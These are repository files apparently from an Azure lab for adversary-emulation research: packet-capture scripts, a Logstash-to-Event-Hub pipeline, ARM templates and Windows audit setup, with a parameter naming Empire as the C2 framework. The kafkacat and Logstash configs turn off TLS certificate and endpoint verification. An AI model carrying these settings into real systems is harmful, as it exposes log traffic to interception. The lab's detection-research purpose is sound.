107 | This environment is set up to start a [packet capture](https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-packet-capture-overview) via the [Azure Network Watcher extension](https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/network-watcher-windows) installed on every Windows VM. Every PCAP is sent to an Azure storage account defined at the moment you start the pcap session. I would do it once you are ready to start the execution of the emulation plan.
108 | 
109 | ### Start Packet Capture
110 | 
111 | ```
112 | bash Start-Packet-Capture.sh -r <Resource Group name> -s <Storage Account name> -c WORKSTATION1,WORKSTATION2
113 | ```
114 | 
115 | ### Stop Packet Capture
116 | 
117 | You can stop the packet capture sessions by running the following command. This does not delete the packet capture session. You will have to delete it if you want to start it again.
118 | 
119 | ```
120 | bash Stop-Packet-Capture.sh -r <Resource Group name> -c WORKSTATION1,WORKSTATION2 -l eastus
121 | ```
122 | 
123 | You can stop and delete the packet captures with the following command:
124 | 
125 | ```
126 | bash Stop-Packet-Capture.sh -r <Resource Group name> -c WORKSTATION1,WORKSTATION2 -l eastus -d
127 | ```
128 | 


--------------------------------------------------------------------------------
/environments/windows/shire/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "numberOfWorkstations": {
 6 |             "value": 2
 7 |         },
 8 |         "setDataPipeline": {
 9 |             "value": "WEF-LOGSTASH-EVENTHUB"
10 |         },
11 |         "c2Framework": {
12 |             "value": "empire"
13 |         },
14 |         "adminUsername": {
15 |             "value": "GEN-UNIQUE"
16 |         },
17 |         "adminPassword": {
18 |             "value": "GEN-PASSWORD"
19 |         },
20 |         "clientRootCertName": {
21 |             "value": "YouRootCAName"
22 |         },
23 |         "clientRootCertData": {
24 |             "value": "Base64-one-line"
25 |         }
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/environments/windows/shire/kafkacat/kafkacat.conf:
--------------------------------------------------------------------------------
1 | metadata.broker.list=<event-hub-namespace>.servicebus.windows.net:9093
2 | security.protocol=SASL_SSL
3 | sasl.mechanisms=PLAIN
4 | sasl.username=$ConnectionString
5 | sasl.password=Endpoint=sb://<event-hub-namespace>.servicebus.windows.net/;SharedAccessKeyName=RootManageSharedAccessKey;SharedAccessKey=<shared-access-key>
6 | enable.ssl.certificate.verification=false
7 | message.max.bytes=1000000


--------------------------------------------------------------------------------
/environments/windows/shire/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 | 
4 | FROM docker.elastic.co/logstash/logstash:7.7.1
5 | LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"
6 | 
7 | # ** Updating kafka integration plugin to 10.1.0
8 | # Reference: https://github.com/logstash-plugins/logstash-integration-kafka/pull/8
9 | RUN logstash-plugin update logstash-integration-kafka


--------------------------------------------------------------------------------
/environments/windows/shire/logstash/config/logstash.yml:
--------------------------------------------------------------------------------
1 | pipeline.batch.size: 500
2 | config.reload.automatic: true
3 | config.reload.interval: 60s
4 | # pipeline.workers: 2
5 | # xpack.monitoring.elasticsearch.hosts: http://helk-elasticsearch:9200
6 | # log.level: warn
7 | # http.host: "0.0.0.0"
8 | # xpack.monitoring.enabled: true


--------------------------------------------------------------------------------
/environments/windows/shire/logstash/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | 
 3 | services:
 4 |   mordor-logstash:
 5 |     build: ./
 6 |     container_name: mordor-logstash
 7 |     logging:
 8 |       driver: "json-file"
 9 |       options:
10 |         max-file: "9"
11 |         max-size: "6m"
12 |     volumes:
13 |       - /opt/logstash/pipeline:/usr/share/logstash/pipeline
14 |       - /opt/logstash/scripts:/usr/share/logstash/scripts
15 |       - /opt/logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml
16 |     entrypoint: /usr/share/logstash/scripts/logstash-entrypoint.sh
17 |     environment:
18 |       - xpack.monitoring.enabled=false
19 |       - BOOTSTRAP_SERVERS=${BOOTSTRAP_SERVERS}
20 |       - SASL_JAAS_CONFIG=${SASL_JAAS_CONFIG}
21 |       - EVENTHUB_NAME=${EVENTHUB_NAME}
22 |     ports:
23 |       - "3515:3515"
24 |     restart: always
25 |     networks:
26 |       mordor:
27 | 
28 | networks:
29 |     mordor:
30 |         driver: bridge


--------------------------------------------------------------------------------
/environments/windows/shire/logstash/pipeline/eventhub.conf:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | input {
 5 |    tcp {
 6 |       port => 3515
 7 |    }
 8 | }
 9 | filter {
10 |   json {
11 |     source => "message"
12 |     tag_on_failure => [ "_parsefailure", "parsefailure-critical", "parsefailure-json_codec" ]
13 |     remove_field => [ "message" ]
14 |     add_tag => [ "mordorDataset" ]
15 |   }
16 | }
17 | output {
18 |   kafka {
19 |     codec => "json"
20 |     bootstrap_servers => "${BOOTSTRAP_SERVERS}"
21 |     sasl_mechanism => "PLAIN"
22 |     security_protocol => "SASL_SSL"
23 |     sasl_jaas_config => "${SASL_JAAS_CONFIG}"
24 |     topic_id => "${EVENTHUB_NAME}"
25 |     ssl_endpoint_identification_algorithm => ""
26 |   }
27 | }


--------------------------------------------------------------------------------
/environments/windows/shire/logstash/scripts/logstash-entrypoint.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | # ********* Setting LS_JAVA_OPTS ***************
 7 | if [[ -z "$LS_JAVA_OPTS" ]]; then
 8 |   while true; do
 9 |     # Check using more accurate MB
10 |     AVAILABLE_MEMORY=$(awk '/MemAvailable/{printf "%.f", $2/1024}' /proc/meminfo)
11 |     if [ "$AVAILABLE_MEMORY" -ge 900 ] && [ "$AVAILABLE_MEMORY" -le 1000 ]; then
12 |       LS_MEMORY="400m"
13 |       LS_MEMORY_HIGH="1000m"
14 |     elif [ "$AVAILABLE_MEMORY" -ge 1001 ] && [ "$AVAILABLE_MEMORY" -le 3000 ]; then
15 |       LS_MEMORY="700m"
16 |       LS_MEMORY_HIGH="1300m"
17 |     elif [ "$AVAILABLE_MEMORY" -gt 3000 ]; then
18 |       # Set high & low, so logstash doesn't use everything unnecessarily, it will usually flux up and down in usage -- and doesn't "severely" despite what everyone seems to believe
19 |       LS_MEMORY="$(( AVAILABLE_MEMORY / 4 ))m"
20 |       LS_MEMORY_HIGH="$(( AVAILABLE_MEMORY / 2 ))m"
21 |       if [ "$AVAILABLE_MEMORY" -gt 31000 ]; then
22 |         LS_MEMORY="8000m"
23 |         LS_MEMORY_HIGH="31000m"
24 |       fi
25 |     else
26 |       echo "$HELK_ERROR_TAG $LS_MEMORY MB is not enough memory for Logstash yet.."
27 |       sleep 1
28 |     fi
29 |     export LS_JAVA_OPTS="${HELK_LOGSTASH_JAVA_OPTS} -Xms${LS_MEMORY} -Xmx${LS_MEMORY_HIGH} "
30 |     break
31 |   done
32 | fi
33 | echo "Setting LS_JAVA_OPTS to $LS_JAVA_OPTS"
34 | 
35 | # ********* Setting Logstash PIPELINE_WORKERS ***************
36 | if [[ -z "$PIPELINE_WORKERS" ]]; then
37 |   # Get total CPUs/cores as reported by OS
38 |   TOTAL_CORES=$(getconf _NPROCESSORS_ONLN 2>/dev/null)
39 |   # try one more way
40 |   [ -z "$TOTAL_CORES" ] && TOTAL_CORES=$(getconf NPROCESSORS_ONLN)
41 |   # Unable to get reported cores
42 |   if [ -z "$TOTAL_CORES" ]; then
43 |     TOTAL_CORES=1
44 |     echo "$HELK_ERROR_TAG unable to get number of CPUs/cores as reported by the OS"
45 |   fi
46 |   # Set workers based on available cores
47 |   if [ "$TOTAL_CORES" -ge 1 ] && [ "$TOTAL_CORES" -le 3 ]; then
48 |     PIPELINE_WORKERS=1
49 |     # Divide by 2
50 |   elif [ "$TOTAL_CORES" -ge 4 ]; then
51 |     PIPELINE_WORKERS="$(( TOTAL_CORES / 2 ))"
52 |   # some unknown number
53 |   else
54 |     echo "[!] eported CPUs/cores not an integer? not greater or equal to 1.."
55 |     PIPELINE_WORKERS=1
56 |   fi
57 |   export PIPELINE_WORKERS
58 | fi
59 | echo "Setting PIPELINE_WORKERS to ${PIPELINE_WORKERS}"
60 | 
61 | # *** Remove Default config ****
62 | rm -f /usr/share/logstash/pipeline/logstash.conf
63 | 
64 | # ********** Starting Logstash *****************
65 | echo "Running docker-entrypoint script.."
66 | /usr/local/bin/docker-entrypoint
67 | 


--------------------------------------------------------------------------------
/environments/windows/shire/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "vmName": {
 6 |             "type": "string",
 7 |             "metadata": {
 8 |                 "description": "Name of the VM to run scripts on"
 9 |             }
10 |         },
11 |         "extensionName": {
12 |             "type": "string"
13 |         },
14 |         "fileUris": {
15 |             "type": "array"
16 |         },
17 |         "commandToExecute": {
18 |             "type": "string"
19 |         },
20 |         "location": {
21 |             "type": "string",
22 |             "metadata": {
23 |                 "description": "Location for all resources."
24 |             }
25 |         }
26 |     },
27 |     "resources": [
28 |         {
29 |             "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 |             "type": "Microsoft.Compute/virtualMachines/extensions",
31 |             "apiVersion": "2019-03-01",
32 |             "location": "[parameters('location')]",
33 |             "properties": {
34 |                 "publisher": "Microsoft.Azure.Extensions",
35 |                 "type": "CustomScript",
36 |                 "typeHandlerVersion": "2.1",
37 |                 "autoUpgradeMinorVersion": true,
38 |                 "settings": {},
39 |                 "protectedSettings": {
40 |                     "commandToExecute": "[parameters('commandToExecute')]",
41 |                     "fileUris": "[parameters('fileUris')]"
42 |                 }
43 |             }
44 |         }
45 |     ]
46 | }
47 | 


--------------------------------------------------------------------------------
/environments/windows/shire/nestedtemplates/customScriptExtension.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "vmName": {
 6 |             "type": "string",
 7 |             "metadata": {
 8 |                 "description": "Name of the VM to run scripts on"
 9 |             }
10 |         },
11 |         "extensionName": {
12 |             "type": "string"
13 |         },
14 |         "fileUris": {
15 |             "type": "array"
16 |         },
17 |         "commandToExecute": {
18 |             "type": "string"
19 |         },
20 |         "location": {
21 |             "type": "string",
22 |             "metadata": {
23 |                 "description": "Location for all resources."
24 |             }
25 |         }
26 |     },
27 |     "resources": [
28 |         {
29 |             "name": "[concat(parameters('vmName'), '/', parameters('extensionName'))]",
30 |             "type": "Microsoft.Compute/virtualMachines/extensions",
31 |             "apiVersion": "2019-03-01",
32 |             "location": "[parameters('location')]",
33 |             "properties": {
34 |                 "publisher": "Microsoft.Compute",
35 |                 "type": "CustomScriptExtension",
36 |                 "typeHandlerVersion": "1.8",
37 |                 "autoUpgradeMinorVersion": true,
38 |                 "settings": {
39 |                     "fileUris": "[parameters('fileUris')]",
40 |                     "commandToExecute": "[parameters('commandToExecute')]"
41 |                 },
42 |                 "protectedSettings": {}
43 |             }
44 |         }
45 |     ]
46 | }
47 | 


--------------------------------------------------------------------------------
/environments/windows/shire/nestedtemplates/vnet-dns-server.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "virtualNetworkName": {
 6 |             "type": "string",
 7 |             "metadata": {
 8 |                 "description": "The name of the Virtual Network to Create"
 9 |             }
10 |         },
11 |         "virtualNetworkAddressRange": {
12 |             "type": "string",
13 |             "metadata": {
14 |                 "description": "The address range of the new VNET in CIDR format"
15 |             }
16 |         },
17 |         "subnets": {
18 |             "type": "array",
19 |             "metadata": {
20 |                 "description": "all subnets available"
21 |             }
22 |         },
23 |         "DNSServerAddress": {
24 |             "type": "array",
25 |             "metadata": {
26 |                 "description": "The DNS address(es) of the DNS Server(s) used by the VNET"
27 |             }
28 |         },
29 |         "location": {
30 |             "type": "string",
31 |             "metadata": {
32 |                 "description": "Location for all resources."
33 |             }
34 |         }
35 |     },
36 |     "resources": [
37 |         {
38 |             "type": "Microsoft.Network/virtualNetworks",
39 |             "apiVersion": "2019-02-01",
40 |             "name": "[parameters('virtualNetworkName')]",
41 |             "location": "[parameters('location')]",
42 |             "properties": {
43 |                 "addressSpace": {
44 |                     "addressPrefixes": [
45 |                         "[parameters('virtualNetworkAddressRange')]"
46 |                     ]
47 |                 },
48 |                 "dhcpOptions": {
49 |                     "dnsServers": "[parameters('DNSServerAddress')]"
50 |                 },
51 |                 "subnets": "[parameters('subnets')]"
52 |             }
53 |         }
54 |     ]
55 | }
56 | 


--------------------------------------------------------------------------------
/environments/windows/shire/scripts/Set-AD.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param(
 6 |     [Parameter(Mandatory=$true, Position=1)]
 7 |     [string]$domainFQDN,
 8 | 
 9 |     [Parameter(Mandatory=$true, Position=2)]
10 |     [string]$dcVMName
11 | )
12 | 
13 | & .\Set-OUs.ps1 -domainFQDN $domainFQDN
14 | & .\Add-DomainUsers.ps1 -domainFQDN $domainFQDN -dcVMName $dcVMName
15 | & .\Set-AuditSAMRemoteCalls.ps1
16 | 


--------------------------------------------------------------------------------
/environments/windows/shire/scripts/Set-Initial-Settings.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param (
 6 |     [Parameter(Mandatory=$false)]
 7 |     [string]$ServerAddresses,
 8 | 
 9 |     [Parameter(Mandatory=$false)]
10 |     [switch]$SetDC
11 | )
12 | 
13 | # Custom Settings applied
14 | & .\Prepare-Box.ps1
15 | 
16 | # Windows Security Audit Categories
17 | if ($SetDC){
18 |     & .\Enable-WinAuditCategories.ps1 -SetDC
19 | }
20 | else{
21 |     & .\Enable-WinAuditCategories.ps1
22 | }
23 | 
24 | # PowerShell Logging
25 | & .\Enable-PowerShell-Logging.ps1
26 | 
27 | # Installing Endpoint Agent
28 | & .\Install-Sysmon.ps1
29 | 
30 | # Set SACLs
31 | & .\Set-SACLs.ps1
32 | 
33 | # Set Wallpaper
34 | & .\Set-WallPaper.ps1
35 | 
36 | # Setting static IP and DNS server IP
37 | if ($ServerAddresses)
38 | {
39 |     & .\Set-StaticIP.ps1 -ServerAddresses $ServerAddresses
40 | }
41 | 


--------------------------------------------------------------------------------
/environments/windows/shire/scripts/Set-Logstash.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -n         EventHub Namespace"
11 |     echo "   -c         EventHub Connection String Primary"
12 |     echo "   -e         EventHub name"
13 |     echo "   -u         Local user to update files ownership"
14 |     echo
15 |     echo "Examples:"
16 |     echo " $0 -n <eventhubNamespace> -c <Endpoint=sb://xxxxx> -e <event hub name> -u wardog"
17 |     echo " "
18 |     exit 1
19 | }
20 | 
21 | # ************ Command Options **********************
22 | while getopts :n:c:e:u:h option
23 | do
24 |     case "${option}"
25 |     in
26 |         n) EVENTHUB_NAMESPACE=$OPTARG;;
27 |         c) EVENTHUB_CONNECTIONSTRING=$OPTARG;;
28 |         e) EVENTHUB_NAME=$OPTARG;;
29 |         u) LOCAL_USER=$OPTARG;;
30 |         h) usage;;
31 |     esac
32 | done
33 | 
34 | if ((OPTIND == 1))
35 | then
36 |     echo "No options specified"
37 |     usage
38 | fi
39 | 
40 | if [ -z "$EVENTHUB_NAMESPACE" ] || [ -z "$EVENTHUB_CONNECTIONSTRING" ] || [ -z "$EVENTHUB_NAME" ] || [ -z "$LOCAL_USER" ]; then
41 |   usage
42 | else
43 |     # Install Docker and Docker-Compose
44 |     ./Install-Docker.sh
45 | 
46 |     echo "creating local logstash folders"
47 |     mkdir -p /opt/logstash/scripts
48 |     mkdir -p /opt/logstash/pipeline
49 |     mkdir -p /opt/logstash/config
50 | 
51 |     echo "Downloading logstash files locally to be mounted to docker container"
52 |     wget -O /opt/logstash/scripts/logstash-entrypoint.sh https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/windows/shire/logstash/scripts/logstash-entrypoint.sh
53 |     wget -O /opt/logstash/pipeline/eventhub.conf https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/windows/shire/logstash/pipeline/eventhub.conf
54 |     wget -O /opt/logstash/config/logstash.yml https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/windows/shire/logstash/config/logstash.yml
55 |     wget -O /opt/logstash/docker-compose.yml https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/windows/shire/logstash/docker-compose.yml
56 |     wget -O /opt/logstash/Dockerfile https://raw.githubusercontent.com/OTRF/SimuLand/master/environments/windows/shire/logstash/Dockerfile
57 | 
58 |     chown -R $LOCAL_USER:$LOCAL_USER /opt/logstash/*
59 |     chmod +x /opt/logstash/scripts/logstash-entrypoint.sh
60 | 
61 |     export BOOTSTRAP_SERVERS=$EVENTHUB_NAMESPACE.servicebus.windows.net:9093
62 |     export SASL_JAAS_CONFIG="org.apache.kafka.common.security.plain.PlainLoginModule required username=\$ConnectionString password='$EVENTHUB_CONNECTIONSTRING';"
63 |     export EVENTHUB_NAME=$EVENTHUB_NAME
64 | 
65 |     cd /opt/logstash/ && docker-compose -f docker-compose.yml up --build -d
66 | fi
67 | 


--------------------------------------------------------------------------------
/environments/windows/shire/scripts/Set-WEC.ps1:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | [CmdletBinding()]
 5 | param (
 6 |     [Parameter(Mandatory=$true)]
 7 |     [string]$ServerAddresses
 8 | )
 9 | 
10 | & .\Prepare-Box.ps1
11 | 
12 | # Set Wallpaper
13 | & .\Set-WallPaper.ps1
14 | 
15 | & .\Set-StaticIP.ps1 -ServerAddresses $ServerAddresses
16 | 


--------------------------------------------------------------------------------
/environments/windows/shire/scripts/Start-Packet-Capture.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -r     Resource Group Name"
11 |     echo "   -s     Storage Account Name"
12 |     echo "   -c     Computer Names (e.g VM01,VM02)"
13 |     echo
14 |     echo "Examples:"
15 |     echo " $0 -r resourcegroup01 -s storageaccount01 -c VM01,VM02"
16 |     echo " "
17 |     exit 1
18 | }
19 | 
20 | # ************ Command Options **********************
21 | while getopts r:s:c:h option
22 | do
23 |     case "${option}"
24 |     in
25 |         r) RESOURCE_GROUP=$OPTARG;;
26 |         s) STORAGE_ACCOUNT=$OPTARG;;
27 |         c) COMPUTER_NAMES=$OPTARG;;
28 |         h) usage;;
29 |     esac
30 | done
31 | 
32 | if ((OPTIND == 1))
33 | then
34 |     echo "No options specified"
35 |     usage
36 | fi
37 | 
38 | if [ -z "$RESOURCE_GROUP" ] || [ -z "$STORAGE_ACCOUNT" ] || [ -z "$COMPUTER_NAMES" ]; then
39 |   echo "[!] Make sure you provide values for the Resource group (-r), Storage Account (-s) and Computer Names (-c) parameters."
40 |   usage
41 | else
42 |     IFS=', ' read -r -a COMPUTER_ARRAY <<< "$COMPUTER_NAMES"
43 |     for COMPUTER in "${COMPUTER_ARRAY[@]}"; do
44 |         sleep 5
45 |         echo "[+] Starting ${COMPUTER}_PCAP session.."
46 |         az network watcher packet-capture create --resource-group ${RESOURCE_GROUP} --vm ${COMPUTER} --name "${COMPUTER}_PCAP" --storage-account ${STORAGE_ACCOUNT} --filters "
47 |     [
48 |         {
49 |             \"localIPAddress\":\"172.18.39.0-172.18.39.255\",
50 |             \"remoteIPAddress\":\"172.18.38.5\"
51 |         },
52 |         {
53 |             \"localIPAddress\":\"172.18.38.5\",
54 |             \"remoteIPAddress\":\"172.18.39.0-172.18.39.255\"
55 |         },
56 |         {
57 |             \"localIPAddress\":\"172.18.39.0-172.18.39.255\",
58 |             \"remoteIPAddress\":\"172.18.39.0-172.18.39.255\"
59 |         },
60 |         {
61 |             \"localIPAddress\":\"172.18.39.0-172.18.39.255\",
62 |             \"remoteIPAddress\":\"10.10.10.5\"
63 |         },
64 |         {
65 |             \"localIPAddress\":\"10.10.10.5\",
66 |             \"remoteIPAddress\":\"172.18.39.0-172.18.39.255\"
67 |         }
68 |     ]
69 |     "
70 |     done
71 | fi
72 | 


--------------------------------------------------------------------------------
/environments/windows/shire/scripts/Stop-Packet-Capture.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | usage(){
 7 |     echo " "
 8 |     echo "Usage: $0 [option...]" >&2
 9 |     echo
10 |     echo "   -r     Resource Group Name"
11 |     echo "   -c     Computer Names (e.g VM01,VM02)"
12 |     echo "   -l     Location (e.g eastus)"
13 |     echo "   -d     Delete PCAP session (Optional)"
14 |     echo
15 |     echo "Examples:"
16 |     echo " $0 -r resourcegroup01 -c VM01,VM02 -l eastus"
17 |     echo " "
18 |     exit 1
19 | }
20 | 
21 | # ************ Command Options **********************
22 | while getopts r:c:l:dh option
23 | do
24 |     case "${option}"
25 |     in
26 |         r) RESOURCE_GROUP=$OPTARG;;
27 |         c) COMPUTER_NAMES=$OPTARG;;
28 |         l) LOCATION=$OPTARG;;
29 |         d) DELETE_PCAP_SESSION="TRUE";;
30 |         h) usage;;
31 |     esac
32 | done
33 | 
34 | if ((OPTIND == 1))
35 | then
36 |     echo "No options specified"
37 |     usage
38 | fi
39 | 
40 | if [ -z "$RESOURCE_GROUP" ] || [ -z "$COMPUTER_NAMES" ] || [ -z "$LOCATION" ]; then
41 |   echo "[!] Make sure you provide values for the Resource group (-r), Computer Names (-c) parameters and Location (-l)."
42 |   usage
43 | else
44 |     IFS=', ' read -r -a COMPUTER_ARRAY <<< "$COMPUTER_NAMES"
45 |     for COMPUTER in "${COMPUTER_ARRAY[@]}"; do
46 |         sleep 5
47 |         echo "[+] Stopping ${COMPUTER}_PCAP session"
48 |         az network watcher packet-capture stop --name "${COMPUTER}_PCAP" --location ${LOCATION}
49 |         if [ ${DELETE_PCAP_SESSION} ]; then
50 |             echo "[+] Deleting ${COMPUTER}_PCAP session"
51 |             az network watcher packet-capture delete --name "${COMPUTER}_PCAP" --location ${LOCATION}
52 |         fi
53 |     done
54 | fi
55 | 


--------------------------------------------------------------------------------